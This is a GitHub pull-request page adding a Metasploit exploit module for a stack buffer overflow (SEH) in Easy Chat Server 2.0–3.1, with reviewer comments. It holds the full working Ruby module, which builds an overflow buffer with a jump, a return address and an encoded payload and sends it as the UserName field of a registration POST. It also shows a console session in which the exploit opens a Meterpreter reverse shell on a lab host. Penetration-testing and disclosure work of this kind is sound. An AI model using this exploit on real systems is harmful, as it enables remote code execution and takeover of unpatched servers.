Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit #8586
Merged

5 commits
bc826cb  Mzack9999  Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit
0b04dc0  Mzack9999  Correct EDB Number
af4eb0f  Mzack9999  Corrected shellcode
a886525  Mzack9999  Added exploit documentation
66eb89e  Mzack9999  Exploit now uses HTTP mixin
@@ -0,0 +1,53 @@ | ||
## Description | ||
|
||
This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. | ||
|
||
This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application | ||
|
||
## Vulnerable Application | ||
|
||
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. | ||
|
||
This module has been tested successfully on | ||
|
||
* Easy Chat Server 3.1 on Windows XP En SP3 | ||
|
||
Installers: | ||
|
||
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe) | ||
|
||
## Verification Steps | ||
|
||
1. Start `msfconsole` | ||
2. Do: `use exploits/windows/http/easychatserver_seh` | ||
3. Do: `set rhosts [IP]` | ||
4. Do: `exploit` | ||
5. You should get your payload executed | ||
|
||
## Scenarios | ||
|
||
``` | ||
marco@kali:~$ msfconsole -q | ||
msf > use exploit/windows/http/easychatserver_seh | ||
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 | ||
RHOST => 192.168.56.101 | ||
msf exploit(easychatserver_seh) > exploit | ||
|
||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] Sending stage (957487 bytes) to 192.168.56.101 | ||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 | ||
|
||
meterpreter > sysinfo | ||
Computer : MM-8B040C5B05D9 | ||
OS : Windows XP (Build 2600, Service Pack 3). | ||
Architecture : x86 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
meterpreter > exit | ||
[*] Shutting down Meterpreter... | ||
|
||
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit | ||
msf exploit(easychatserver_seh) > | ||
``` |
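Review bot: step 2 of the verification steps (`use exploits/windows/http/easychatserver_seh`) and the scenario transcript (`use exploit/windows/http/easychatserver_seh`) give different module paths, and step 3 (`set rhosts [IP]`) names a different option from the transcript (`set RHOST 192.168.56.101`); align the steps with the transcript, since that is the form shown actually working. The description places the overflow in the username parameter of the registration page 'register.ghp', but the module in this PR posts `UserName` to 'registresult.htm'; the doc should name the request the module actually sends so a reader can correlate it with traffic or server logs. The "Vulnerable Application" section puts 2.0 in scope while the only tested configuration is 3.1 on Windows XP En SP3; state explicitly that the 2.0 end of the range is untested. Minor: "is a easy, fast and affordable way" should read "an easy, fast and affordable way", and "Installers:" links straight to the ecssetup.exe binary rather than the vendor's download page.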
@@ -0,0 +1,74 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
|
||
Rank = NormalRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)', | ||
'Description' => %q{ | ||
This module exploits a buffer overflow during user registration in Easy Chat Server software. | ||
}, | ||
'Author' => | ||
[ | ||
'Marco Rivoli', #Metasploit | ||
'Aitezaz Mohsin' #POC | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'EDB', '42155' ], | ||
], | ||
'Privileged' => true, | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", | ||
}, | ||
'Platform' => 'win', | ||
'Targets' => | ||
[ | ||
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ], | ||
], | ||
'DefaultOptions' => { | ||
'RPORT' => 80, | ||
'EXITFUNC' => 'thread', | ||
'ENCODER' => 'x86/alpha_mixed' | ||
}, | ||
'DisclosureDate' => 'Oct 09 2017', | ||
'DefaultTarget' => 0)) | ||
end | ||
|
||
def exploit | ||
sploit = rand_text_alpha_upper(217) | ||
sploit << "\xeb\x06\x90\x90" | ||
sploit << [target.ret].pack('V') | ||
sploit << payload.encoded | ||
sploit << rand_text_alpha_upper(200) | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(URI,'registresult.htm'), | ||
This should be
||
'method' => 'POST', | ||
'vars_post' => { | ||
'UserName' => sploit, | ||
'Password' => 'test', | ||
'Password1' => 'test', | ||
'Sex' => 1, | ||
'Email' => 'x@', | ||
'Icon' => 'x.gif', | ||
'Resume' => 'xxxx', | ||
'cw' => 1, | ||
'RoomID' => 4, | ||
'RepUserName' => 'admin', | ||
'submit1' => 'Register' | ||
} | ||
}) | ||
handler | ||
This is redundant.
||
|
||
end | ||
end |
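Review bot: `'uri' => normalize_uri(URI,'registresult.htm')` in `exploit` passes Ruby's stdlib `URI` module as the first path component instead of a module option, and `initialize` registers no `TARGETURI`; `normalize_uri` joins its arguments with "/" after stringifying them, so the request path is built from the literal string "URI" rather than a user-supplied base path, and a server hosting the application under a prefix cannot be targeted. Register the option, e.g. `register_options([OptString.new('TARGETURI', [true, 'Base path of the Easy Chat Server web interface', '/'])])`, and build the request with `normalize_uri(target_uri.path, 'registresult.htm')`. Three more points in the same hunk: `'Privileged' => true` contradicts the accompanying documentation, which says the payload runs in the context of the user running Easy Chat Server, so either justify it or set it to false; `'DisclosureDate' => 'Oct 09 2017'` postdates the 2017-06-20 session shown in the documentation's scenario and should be the date of the EDB 42155 entry; and 'Registeration' in `Name` is misspelled. There is also no `check` method; a `check` that requests the registration page and fingerprints the server would let users confirm the target before sending an SEH overwrite that will likely crash a non-vulnerable or mismatched build.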
I think you want to register TARGETURI.